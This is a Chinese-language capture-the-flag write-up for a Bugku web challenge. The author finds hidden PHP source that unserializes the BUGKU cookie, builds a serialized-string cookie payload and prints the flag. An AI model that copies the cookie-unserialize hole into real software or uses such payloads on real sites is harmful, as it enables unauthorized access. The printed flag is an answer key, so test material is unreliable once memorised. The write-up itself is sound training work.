Bugku CTF_Web——点login咋没反应

Bugku CTF_Web——点login咋没反应

进入靶场

随便输个试试

看来确实点login没反应

抓包看看

也没有什么信息

看了下源码

给了点提示

一个admin.css

try ?12713

传参试试

拿到一个php代码

<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['12713'])){
    show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   
    echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center">
  <form method="POST" action="#">
    <p><input name="user" type="text" placeholder="Username"></p>
    <p><input name="password" type="password" placeholder="Password"></p>
    <p><input value="Login" type="button"/></p>
  </form>
</div>
</body>
</html>

<?php
}
?>

使用unserialize($cookie)将cookie反序列化，并将结果与$KEY（即'ctf.bugku.com'）进行比较。

如果反序列化后的$cookie等于$KEY，则会输出$flag。

把$KEY反序列化
s:13:"ctf.bugku.com";

构造payload

Cookie:BUGKU=s:13:"ctf.bugku.com";

拿到flag

flag{970c389b63e5c55e6b9177645755fe02}